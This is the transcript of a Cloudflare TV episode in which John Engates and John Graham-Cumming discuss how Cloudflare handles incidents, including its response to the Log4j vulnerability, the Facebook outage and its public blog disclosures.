Behind the Scenes: Incident Response at Cloudflare

Name: Behind the Scenes: Incident Response at Cloudflare
Uploaded: 2022-05-06T15:00:00.000Z
Duration: 30 min
Description: We’ll discuss how Cloudflare responds to security incidents and vulnerabilities and go behind the scenes to examine the activities surrounding the Log4j vulnerability in December 2021.

Presented by: John Engates, John Graham-Cumming

Originally aired on May 12, 2023 @ 6:00 AM - 6:30 AM EDT

We’ll discuss how Cloudflare responds to security incidents and vulnerabilities and go behind the scenes to examine the activities surrounding the Log4j vulnerability in December 2021.

English

Security

Transcript (Beta)

Hello. Welcome to Cloudflare TV. My name is John Engates. I'll be your host for the next 30 minutes. Our program today is called Behind the Scenes. And in this episode, we're going to talk about incident response at Cloudflare. How does Cloudflare respond when a new vulnerability is discovered? What happens when we see a significant BGP or DNS outage on the Internet? And why do we write a blog post about a fiber cut on the other side of the world? We'll dig into these topics and more right now on Behind the Scenes. My guest today on Behind the Scenes is John Graham-Cumming, who is CTO at Cloudflare. Welcome, John. It's nice to see you, John. Yeah, it's good to see you. So, John, I know you're a bit of a regular on Cloudflare TV. This is actually one of my first episodes. But would you give our viewers just a brief sort of background on yourself and your role at Cloudflare, what you've been doing over these years, and just give them a little background. Well, I'm currently CTO of Cloudflare and have been for a number of years. I actually joined Cloudflare as a programmer. I wrote quite a lot of code that goes into our system, particularly stuff around compression, DNS, the WAF, and other bits of it. And over time, I managed different parts of the organization, everything that was technical. Eventually, as we grew, those things got their own leaders. Right now, I have a small group of people, it includes you, John, in case you forgot, the field CTO organization, which goes out and works with our largest customers on the kind of technical problems they have. I also have the research team under Nick Sullivan that works with universities on long-term research projects. And then I have a team of engineers working on data, who are looking at data so that we can improve our products and also expose as much of that data as we can to the world so people can understand how the Internet works. Well, I think it's important for folks to hear about your background, because I think it likely shapes how you're inclined to respond to incidents and things that are going on. But before we get ahead of ourselves, can you help me explain to the viewers what is an incident? When I say that word, maybe give them an idea of what you think of and the broad categories that those things fall into. Yeah, I mean, we actually have internally a process around incidents where there is an on-call incident commander, and that person can declare an incident through our chat ops system. And that could be anything from a major outage of Cloudflare systems, right, if Cloudflare were to go down, to a smaller component of Cloudflare that is failing, that needs all hands on deck. It could be a security vulnerability that someone's found that is serious and needs addressing quickly. Or it could be something that's happening on the Internet that is having a knock-on effect on Cloudflare. So that could be a BGP leak, for example, which might be happening somewhere else on the Internet. Or even actually, funnily enough, when Facebook went down last year, so many people were trying to get to Facebook. Facebook's not a customer. But actually, it caused load on our DNS systems because people were going Facebook, Facebook, Facebook, Facebook. And so all these things could be incidents. And we have a pretty broad definition of that. And in fact, anyone in the company, a bit like the old anyone can stop the Toyota production line, can say, hey, this should be an incident and call it. And if it doesn't actually reach the level of needing an immediate response, then we'll close the incident. In fact, there was one of those that happened yesterday. I got paged for something which looked like it might be bad. And in fact, we said, oh, actually, no, this was a false alarm. So we have a broad range of all hands on deck, get people in the right room, get them all discussing the problem very quickly. And we've now automated all of that process. Yeah. Well, I imagine you've seen your fair share of those kind of incidents in 10-plus years at Cloudflare. I, too, have seen those in my career. Actually, this is one of the reasons why I wanted to interview you today. It's because it's something that I've experienced over and over again. My best story of an incident happening in one of my previous lives was an individual ran their truck into the transformers of a major data center, and it created all kinds of problems. They passed out their vehicle, launched over a parking lot and other cars, and they hit the building. And the fire department basically had to de -energize the entire facility to save the life of this individual. So incidents can be small, they can be minor, or they can be major. When I think about incidents, these are things that happen every day. Things around the world happen. But when you're running services like we are that are critical to operating other people's businesses, their livelihood is in your hands. It's a huge responsibility. Do you think about that when we're managing incidents? Is that something that comes into your mind, or is it just always in the background, or how do you think about the importance? I think if we have a major incident, then clearly that's in the back of our minds. We have to get this back online as quickly as possible, just because of the scale at which Cloudflare operates. Remember, we're in more than 250 cities worldwide where we have hardware, millions of customers. You, dear watcher, have gone to something that Cloudflare protected today without you realizing it, probably used an app that we protect or something like that, gone to a website, and maybe your business uses Cloudflare. So us being up is very, very important. So obviously, we want things to be back online. Obviously, there are metrics around how many nines of reliability we have, so that's very, very important. And so I think that's in the back of our minds. The scale of what we're doing is certainly there, although I have to say that during an incident, I'm not thinking about that at all. We're thinking about what do we need to do to get it back online? What do we understand about what the problem is? Yeah, it's sort of executing the plan, so to speak, in terms of incident response. And I honestly think that that's the true test of a company and the organization that you put around it is the people and how they respond during a crisis. Under pressure sort of is the true test of an individual and a company. Also, sort of how it communicates with its customers during those stressful times. So let me zoom out a little bit. For the viewers, John mentioned this. I work on his team. He hired me into Cloudflare in October of last year. I've worked for many years in a lot of service providers. I've seen good and bad and ugly responses to incidents. I know from the outside looking in at Cloudflare how I perceived the response. I mean, I usually saw it in the form of a blog post or a post-mortem write -up that Cloudflare put out after an incident. Whether something went right or wrong, it gets sort of a detailed blog post. And sometimes, like John mentioned, it's not even an incident that happened at Cloudflare or inside Cloudflare, just something that happened elsewhere on the Internet. Right after I joined, the log4j vulnerability was one of the first major incidents that I got to observe sort of after onboarding at Cloudflare. And I want to use that as an example today. This vulnerability was discovered back in December 2021. I was on the internal chat rooms. I was watching behind the scenes. And it was interesting for me to watch this sort of unfold, as John mentioned, the urgency, the level of attention from senior leaders. It was very impressive to me. I guess I would say it's somewhat unique. I mean, I've seen good teams, great teams, but this was a pretty unique sort of example of this. So, John, before I jump into that anymore, is there anything on that particular incident that stands out for you that made it unique or that made it something different or out of the ordinary? Well, actually, it's interesting you asked that question about that one because what happened was when log4j came out, I think our immediate thought was we have to protect our customers because many of our customers will be using Java and they will have this. And we know from experience that once a vulnerability comes out, attackers start using it immediately. Even if it's just scanning, they'll start doing this stuff within hours. So, initially, we were going down the route of we need to roll out protection in the WAF and put it out for all customers. And actually, quite quickly, we thought, wow, this is really bad. We should roll out protection for all of our customers, even those who don't pay for the WAF. And actually, we eventually ended up formalizing that process where we have a free tier in our WAF for sort of the worst of the worst vulnerabilities. Shellshock is one of them. And then log4j, where we'll say, look, we'll just protect you if you don't pay us because that's going to make the Internet safer. And so, initially, we were doing that. In the middle of it, I was on the phone with Dane Connect, who is the SVP of emerging technology, who has worked at Cloudflare pretty much as long as me. And we were discussing, and we were working with the WAF team, making sure stuff was getting out. And suddenly, we were like, wait a minute, we use Java. Maybe this is, you know, we're vulnerable. Maybe we're under attack as well. And so, obviously, we were doing the WAF and then we were looking at our own system. So, that was actually slightly unusual because usually, it's like either we've got a problem or it's outside and we're protecting customers. But in this case, it was we could be vulnerable and our customers are. And at that point, we declared an incident. I believe Dane actually hit the big red button on chat ops, declared an incident, and woke people up around the world, literally. So, it was early morning for me in the UK, in Europe. And then Dane was late at night. And then we woke up the security team. We had people in Australia and we had everybody jump on it very quickly. So, that was unusual because we were working two different angles at the same time. And also, we felt that, you know, Cloudflare communicates a lot through the blog. And we always have a process whereby we start keeping a record of what was happening so that we can write the blog post. And so, part of that happens in chat because lots of things happen in chat. The part that will happen in Google Docs where we'll just start keeping records of like, oh, we did this, this happened. We saw this piece of information so that later on, we can write stuff up. So, it's almost as if we're writing the incident report simultaneously with the actual incident happening. And I think that's become a powerful part of the process. Let me see if I can share a couple of slides that I've compiled. Can you see that, John? Yeah. Yeah, I do. Okay. So, this is a few slides that I pulled together. Just, you know, over the last few months, I've had to explain our response to customers and partners and folks that we've worked with. But I took some of these just sort of out of a presentation that I did. So, as John mentioned, this vulnerability Log4j was sort of released or announced December 9th. I don't want to spend too much time dissecting Log4j. That's been done. Again, just sort of setting the stage for what was going on behind the scenes, as John was talking about. So, it was a very high risk vulnerability. They rated it as a 10 out of 10. It was something that could be exploited externally. So, that made it a potential vector for attack that was really, really critical. So, this was what John was mentioning, Dane Connect. He was on Twitter early in the morning, 2 a.m. his time, I imagine, talking about what was going on, what we were seeing, basically warning the world to patch their Internet-facing Java servers, making sure they get them behind a WAF, sort of telling the world that this was a really critical vulnerability that was on par with some of the worst that we'd seen in the past, and also telling customers that we were getting ready for implementing WAF rules. This was another snippet that I took between you and Dane and Matthew, our CEO. This was just one little snippet that I took, and I'll zoom in on it because I think it's really interesting to see how we communicate behind the scenes. This is the worst vulnerability the Internet has seen. I don't know. I can't quite see the top there, but in five-plus years, nothing else you're working on is more important than this. It trumps our CIO week, which was going on at the time, and everything else, literally a drop-everything moment. And then he went on to say he wanted to publish the definitive post on what this vulnerability is, how long it's been out, how it got introduced, how it's being exploited, and he wanted to get it written up ASAP, and we'll get more information as we learn more. So, you kind of get a little flavor of how we're communicating behind the scenes, and that led to what John was mentioning, the blog post. This was, I think, the very first one that was published the day after the announcement, probably not even 12 hours later. It just happened to fall across a time boundary between days. Then we also had sort of mitigation that we were putting in place, the rules, the three new WAF rules that we had deployed. Matthew making the determination that this was so bad, as John mentioned, that we were going to roll this out to all of our customers, not just paying customers, but people that were on free plans. This was the write-up that you mentioned that was the internal response, our own IT organization, our own teams behind the scenes in engineering, and how we took it on sort of the internal perspective and tried to understand what implications it had. And then even going further and talking through how we prevent the spread of Log4j in terms of log updates, the new sanitizing logs, making sure that we weren't the source of more sort of contamination of other people's systems. So, all of that, and then finally sort of looking backwards into our log files. John mentioned that we have visibility into what's going on in a vast array of servers around the world. So, we have visibility into where this is being exploited potentially and when it began. And so, it was another interesting blog post that talked about that. So, I'll stop sharing for a minute. We can discuss a little bit of that, but that to me is pretty telling in terms of the priority that Cloudflare puts on communication and understanding what's going on. Actually, there was a thing you sort of skipped over in those slides, is where you were looking at the chat where Matthew was saying, you know, I want this to be a definitive blog post. I think I pasted into the chat, here's the Google Doc with the blog post already written, because we had already started as part of our process knowing, yeah, we're going to have to communicate about this. So, we'd already started writing it. And I think one of the things, yeah, you see it right there. He's, you know, he's saying 10.37 a.m. I want us to post a definitive blog post. Three minutes later, I paste, by the way, you know, here's the text of that blog post. And I didn't write it in three minutes. What happened was we had already started working on it. And I think one of the things that's interesting about our process is, if you declare an incident in Cloudflare, and this clearly was an incident, it creates a chat room specifically for that incident, which has many things associated with it. It has a commander, but it creates a set of threads, which have different purposes. So, instantaneously, you've got a thread that's on debugging, like, how do we debug this thing? You've got a thread that's on impact. So, who's effective? And so, what you'll see is, if this was an outage by Cloudflare, the debug thread would have people debugging the problem. The impact thread would have the support team in there, making sure they understand what they're going to say to customers. And then there's a comms thread, which talks about how we're going to communicate outside. So, we're, like, instantaneously, we're off working on all of those things simultaneously. And people will be taking on different roles as part of it. Because we truly, truly, truly value getting the information out as quickly as we can about these things, whether it's an external thing, like log4j, or whether it's an internal problem. Yeah. Again, I was fascinated, personally, to watch the stream of communication back and forth between individuals. Sometimes, there are people that land in a chat room, and everybody's trying to help make sure that people sort the communication appropriately. And sometimes, I imagine there can be too many people in a room as well, people trying to get information too early. I have noticed that sometimes we will make certain chat rooms designed for certain organizations, or parts of the organization, so that we don't step on each other's toes, or we don't accidentally slow things down in terms of response. Tell me about that process. So, a little bit. Although, to be honest with you, I mean, you mentioned that you were in the chat rooms for log4j, and seeing what was going on. And you weren't a special privileged invitee, right? You're just like, well, yeah, there's something going on. I want to see what's going on. So, we generally don't close off these things. People can join in. There's usually, when the chat ops thing runs, there's also a video call that is created as well. So, usually, the core debugging stuff is going on in the video call, with information being pasted into the chat for recordkeeping, and also just to share with people. So, usually, that's actually not a very big deal. Sometimes, you'll have people, you know, wandering half an hour late and say, by the way, it looks like the Internet doesn't work, or something. We're like, yeah, we know. We're working on it. But mostly, it will allow people to participate from wherever they are, and people can jump in with information. So, I think we try to be very open about that. I don't think we would lock it down. Occasionally, we'll take something off on the side. I think the interesting thing with the Log4J one was that we spent, obviously, there were these two things going on, which is like, how do we protect our customers as fast as we can, right? And how do we protect Cloudflare? Like, are we being exploited? Because we were worried that, you know, someone had got into Cloudflare, into critical infrastructure. So, yeah, the security team under Joe Sullivan was really working on that side of it, right, with IT. They were thinking about that side of it. The WAF team was like rolling out rules, looking at evasion, updating things. And then the data team here in Lisbon was digging into the data, trying to figure out when was the first exploitation, what have we seen, where is it happening? So, you had a lot of things happening simultaneously. I think one thing that's really, really important is, we developed an organization with this very high degree of trust that people are going to do stuff, right? So, it's just like, you know, Dane and I were talking. We paged Joe Sullivan. He's like, yeah, I'll get the team on it. They're on it. And, you know, we would check in with them from time to time where they'd ask us for a piece of information. But it's just a lot of autonomy that enables us to do these things very, very rapidly. And then usually, especially if it's something major and it's something public, someone who's good at writing fast, it can be me quite often, but others, will get working on the public disclosure. So, we're all ready to go. And an amusing one, in some ways, was Facebook at a massive outage last year. And obviously, we saw it from our perspective because we saw traffic change in terms of DNS, because people kept going to Facebook and we weren't a big DNS service. So, it actually doubled the load on our DNS service, just because people were retrying Facebook and the apps were retrying. And so, we had an incident around that. And we actually managed to put out a blog explaining what had happened to Facebook. If they're not a customer, we didn't have inside information, but from the external view, before the incident was over, before Facebook came back online. We were basically explaining that it was a DNS issue. You knew, based on the thing that we were seeing. We knew it was. Initially, it was DNS, then it was really BGP. And in fact, we saw they'd withdrawn themselves from the Internet. And amusingly, some actual engineers from Facebook contacted us and said, you've got that almost 100% right. Could you just make this modification to your blog post? This is actually what's going on internally. And by the way, why do we do this? Especially right at the beginning of Cloudflare's history, we were a small company. And if you think about what Cloudflare does, which is, if you use our service, your network traffic is passing through us. And if you think about it, if we go down, you go down. And so, we had to build trust with our customers. And one way was just to be very transparent about things. If things go wrong, if things go well, how we build things, what technologies we use. And so, we built this culture just like, look, if something goes wrong, we'll just talk about it. And we'll just be completely open about it. And there are a couple of things that are important about that. One is, if you're going to be completely open, then you're probably going to say things that you have to take back because you didn't fully understand the situation. And it's going to be hard because you're going to show that you made mistakes. And the second thing is you have to do it fast. And so, one of the things I see happen in companies that don't do this is they take a long time to give you partial information about what happened. And one of the things that I think is incredible about Cloudflare, and especially after we went public, but even before, is that Cloudflare's legal department can get involved in signing off on a public disclosure of a major outage that Cloudflare has. And I have seen it happen in minutes, multiple times, where I can go to the legal team and say, the outages, here's what's happened. Here's the public disclosure. I need you to read it and tell me if there are any legal issues here. And that, I think, gets stuck in other companies. I think it's like, no, legal is going to sign off on this. And then, comms is going to sign off on this. And before you know it, days have gone by. Your customers don't know what's to your service. It just generates a situation where people don't trust you. And by the way, in terms of the comms team, the way in which the comms team, that the comms works at Cloudflare, obviously, comms is involved in incidents. They're invited into the incident room. Again, we have an extremely good relationship with Daniela's group in comms. And so, she will typically, especially if there's a major outage, she will talk directly to me. I usually am the interface with her. And we'll keep them updated on what's happening, where we think it's going, because the press will start to ask, right, what's happening? And then, we communicate that. And then, we'll put out the definitive description of what happened and where we are, whatever. There's no sign off from the comms team. It's like, here's the deal. This is what's happening. It's very much an engineering culture in Cloudflare. That's what runs things. And the other groups are incredibly supportive of that mission. And I think the reason they're incredibly supportive is because we've proved that it works to do that. And I think having the support from the senior leadership in a situation like that, you've got Matthew, you've got yourself, you've got really the whole senior team involved. And that permeates the culture. They see that people are rolling up their sleeves and doing behind-the-scenes activities in this sort of situation. I mean, people like to follow leaders that are in the trenches with them. And we know that sort of approach works. And I think it's just fascinating to see it, again, behind the scenes where all of the folks are communicating in real time and getting the information to the people like comms. Comms is the interface to the outside world from a press perspective, from people that might send inbound requests. The blog is another great way to get that information out. And it's been, to me, that's been one of the other secrets, not -so-secret kind of weapons of Cloudflare is the ability to get information out on our blog and share as much detail as we do, because that's not done in a lot of organizations. I mean, from technical details of a product launch or analysis of an incident or a vulnerability or something, it's just very rare to see that level of transparency and regular cadence. I mean, you're the person behind the blog in many ways. I mean, you're the person I see most active on the blog in terms of that cadence must be hard to keep up at. How does that, just sort of tell me two minutes, how does that work behind the scenes at Cloudflare? Well, I mean, we track blog posts in JIRA, right? So there's a process for that. And I make the final call on what gets published and I edit every blog post. So anything gets published on Cloudflare, I go through and I will give feedback on it. We also have our product content experience team who will make sure that the language is good and all that kind of stuff. But it's a fairly agile process realistically using JIRA where we can just push things through. And of course, because I'm the final sign-off, if we need to push something out right now, I can just jump all the steps and go, this is what we're doing. Again, a high trust environment, right? I mean, there's nothing stopping me from publishing something immediately without other people signing off. I probably wouldn't do that because I might want legal advice on something, but we have a very good environment in which people trust each other. I'll give you an interesting example. Three years ago, before we went public, while we were still, we were working on going public, we had a massive outage. And Matthew called me, I was in the middle of the afternoon in London, Matthew called me on my phone and he said, it's the shortest phone call I've ever had with him. He said to me, what's going on? And I said, I don't know. And hung up. I've never hung up on him before, but I was like, I'm too busy to talk to the CEO. We're figuring this thing out. And we got it back online very, very quickly. And I think that, you know, we work like that. And I was able to then call him back and say, okay, here we are. This is what the situation is. And obviously, you know, he himself was very worried about the situation, but I think that we have built a team that is able to make very rapid decisions. In the last few minutes, I wanted to talk about one category of outage or incident that we see sometimes on the blog. This is a great segue into this, but every once in a while, I see a post about some sort of a fiber cut or an Internet outage or some sort of disruption in Internet connectivity on the other side of the world, unrelated to Cloudflare, not even something, why do we pay attention to those kinds of incidents? Well, I think you're wrong that it's unrelated to Cloudflare, basically. I mean, Cloudflare, remember, seemingly unrelated. Okay. So global company, global company, our customers are in more than a hundred countries worldwide. We're not, you know, a U.S. focused, you know, more, most of our revenues from outside of the U.S. Our customers, customers are everybody who uses the Internet. And so, you know, a fiber cut in Fiji is going to affect, you know, a group of people there who've lost access to the Internet. And oftentimes it's hard to know what's really going on when these problems happen. And we, because of our 250 cities worldwide, the scale of our network, we have a really good view of what's happening on the Internet everywhere. I, you know, if I want to go in and say, Hey, how's the performance of this mobile network in Indonesia today? I can get that information because of the scale of what we're doing. Just today, for example, Google Cloud had an outage, which affected some services and we could see it in our data. And we tweeted about it a few hours ago. It was like, you can see what's happening. And so what we do is we try and create a situation where people can trust the Internet, can understand what's happening in the Internet. You can actually look on Cloudflare radar and see some of our insights. And I think it's important for people to know how the Internet works to see and get definitive information. And we have that view of the, you know, the Internet weather, if you like. And so we will push out information about that, about outages. You know, you see outages in places all over the place. And I think it's just part of what we do. And remember our mission, help build a better Internet. And I think visibility is part of helping. Absolutely. And I imagine that informs the decisions around how we need to shape and adapt our network over time as well as sort of for a future direction. Like if we're seeing patterns of disruption in certain parts of the world or issues, connectivity, you know, between an ISP and a particular customer of ours helps us shape our products as well. Absolutely. We can shape, you know, where we want to have better connectivity, where we should cite servers, you know, where the users are, what the performance looks like on those networks. It really does that. That data gives us a view that enables us to do two things, a higher performance network and better security because we have visibility into what's happening pretty much anywhere in the world. Well, I think with that, John, I wanted to say thank you for joining me today on Cloudflare TV and talking about incidents. I think it's been eye-opening for me to understand sort of the behind the scenes activities. And I hope the viewers also understand that it's really important to us and we're going to keep doing it. And hopefully we'll share more detail with you as we learn new techniques and new ideas for how to communicate. Thank you again, John. Thanks very much for having me. It's great to be back on Cloudflare TV. It's been a while. It's great. Thanks.